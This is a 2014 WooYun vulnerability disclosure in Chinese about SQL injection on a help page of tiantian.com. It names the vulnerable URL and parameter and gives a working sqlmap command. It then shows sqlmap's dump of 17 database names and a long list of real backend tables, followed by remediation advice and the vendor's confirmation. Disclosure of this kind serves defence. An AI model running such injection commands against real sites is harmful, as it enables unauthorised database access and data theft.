天天网某站SQL注入可导致多个数据库数据泄漏

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-058912

漏洞标题：天天网某站SQL注入可导致多个数据库数据泄漏

漏洞作者： her0ma

提交时间：2014-05-01 10:21

修复时间：2014-06-15 10:22

公开时间：2014-06-15 10:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-01：细节已通知厂商并且等待厂商处理中
2014-05-04：厂商已经确认，细节仅向厂商公开
2014-05-14：细节向核心白帽子及相关领域专家公开
2014-05-24：细节向普通白帽子公开
2014-06-03：细节向实习白帽子公开
2014-06-15：细节向公众公开

简要描述：

天天网(http://www.tiantian.com)某站存在SQL注入漏洞，可以导致多个数据库的数据泄漏。

详细说明：

存在漏洞的站点：http://help.tiantian.com；
具体的漏洞页面：http://help.tiantian.com/resp/pensong.aspx；
是post类型的，具体的漏洞参数：t=gshi&v=6 参数v存在问题；
SQLMAP注入测试命令：
sqlmap.py -u "http://help.tiantian.com/resp/pensong.aspx" --data="t=gshi&v=6" -p "v" --tables -D newsite --risk 5 --level 5
如图所示：

漏洞证明：

数据库列表：

web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] CPS_Log
[*] CPS_Union
[*] DBAdmin
[*] master
[*] model
[*] msdb
[*] newsite
[*] NewSite_Action
[*] NewSite_Archive
[*] NewSite_Biz
[*] NewSite_His
[*] NewSite_Wireless
[*] SiteBase
[*] tempdb
[*] tuan_sub
[*] WMSys_SKU_sub
[*] WMSys_sub

当前库表名如下：

web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: newsite
[640 tables]
+----------------------------------------+
| Action_CouponValidate_Log              |
| Action_Lottery_Account_Integral_Log    |
| Action_Lottery_Account_Send_Info       |
| Action_Lottery_Common                  |
| Action_Lottery_Common_Log              |
| Action_Lottery_True_Items_Send         |
| Action_MeiTuanTemp_UserInfo            |
| Active_PromoteList                     |
| Activities_Colif                       |
| Activities_DetailsRules                |
| Activities_Main                        |
| Activities_OtherRules                  |
| ActivityPosition                       |
| Activity_DayCount                      |
| Activity_Name                          |
| Activity_Product                       |
| Activity_User                          |
| Analysis_UserRegistered                |
| Answer_Vote                            |
| App_Base_ProductInfo                   |
| AutoKeywords                           |
| AutoKeywordsDetails                    |
| BPS_ActivityLog                        |
| Base_Action_Lottery_True_Items         |
| Base_CardEndNum                        |
| Base_CityRelation                      |
| Base_ProductInfo                       |
| Base_ProductInfo_Extend                |
| Base_ProductRecord                     |
| Base_ProductSalePrice                  |
| Base_ProductType                       |
| Base_ProductType_Extend                |
| Base_Product_PriceContrast             |
| Base_UserInfo_Extend                   |
| Base_illegalWords                      |
| Bind_User                              |
| Bind_UserCard                          |
| BindingProductDetails                  |
| BindingProductMain                     |
| Bizviva_ExpressTypeInfo                |
| Bizviva_Media                          |
| Bizviva_ProductInfo                    |
| BlackList                              |
| Brand_UserCardFor                      |
| Brand_imgInfo                          |
| CMS_TemplateContent_Input              |
| CPC_Activity                           |
| CPC_Search                             |
| CPM_Activity                           |
| CPM_Search                             |
| CallCenter_CustomerList                |
| CallCenter_PhoneBatch                  |
| CallCenter_PhoneList                   |
| CallCenter_PhoneRecord                 |
| CallCenter_PhoneVisitList              |
| CallCenter_ReservationTask             |
| CallCenter_UserAnswer                  |
| CallCenter_UserBrand                   |
| Cancel2money                           |
| CancelList                             |
| CardBrand                              |
| CardRule                               |
| CardTemp                               |
| CardTypeExchange                       |
| CardUsed_DayCount                      |
| CardUser                               |
| Card_Mobile                            |
| CartCacheBaseObject_Log                |
| CartCacheObject_Log                    |
| ChannelTuan_ActiveInfo                 |
| Com_CCProblem                          |
| Com_Department                         |
| Com_Question                           |
| Com_Study                              |
| Com_WorkNote                           |
| Com_topic                              |
| Comment_Star                           |
| Comment_useIP                          |
| Commentlist_Extend                     |
| Content_Management                     |
| Cooperation_API_ProductType            |
| Cooperation_API_ProductType_Relation   |
| Coupon_Cancel                          |
| CreateOrderStepRecover                 |
| CreateOrderinfoTimeTest                |
| DM_zpinfo                              |
| DP_Coupon                              |
| DP_Orderinfo                           |
| DianPing_Base_CityRelation             |
| DianPingtuan_Input_Excel_Order         |
| DisableIP                              |
| EDM_activity                           |
| EDM_search                             |
| EDM_user                               |
| Email_ActivationRecord                 |
| ErrorOrder                             |
| ErrorOrderRecord                       |
| ExpressDetailsCity                     |
| ExpressMainInfo                        |
| ExpressTypeInfo                        |
| FBA_Oitem                              |
| FBA_Orderinfo                          |
| FeedBack                               |
| FreeOrder_UserList                     |
| Free_Product                           |
| Free_Product_DM                        |
| From_ActivityList                      |
| From_ActivityProductList               |
| From_Advertisers                       |
| From_MediaFlow                         |
| Ftuan_Base_CityRelation                |
| Ftuan_Input_Excel_Order                |
| GM_Input_Excel_Order                   |
| GetPassword                            |

wooyun上传图片功能挂掉的节奏，所以只好复制了。

修复方案：

1，对参数v进行类型判断，过滤；
2，SQL语句不要拼接，使用存储过程；

版权声明：转载请注明来源 her0ma@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-05-04 10:33

厂商回复：

留个在线联系的方式，发放小礼物

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-058912

漏洞标题：天天网某站SQL注入可导致多个数据库数据泄漏

相关厂商：tiantian.com

漏洞作者： her0ma

提交时间：2014-05-01 10:21

修复时间：2014-06-15 10:22

公开时间：2014-06-15 10:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 her0ma@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-058912

漏洞标题：天天网某站SQL注入可导致多个数据库数据泄漏

相关厂商：tiantian.com

漏洞作者： her0ma

提交时间：2014-05-01 10:21

修复时间：2014-06-15 10:22

公开时间：2014-06-15 10:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-058912"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 her0ma@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：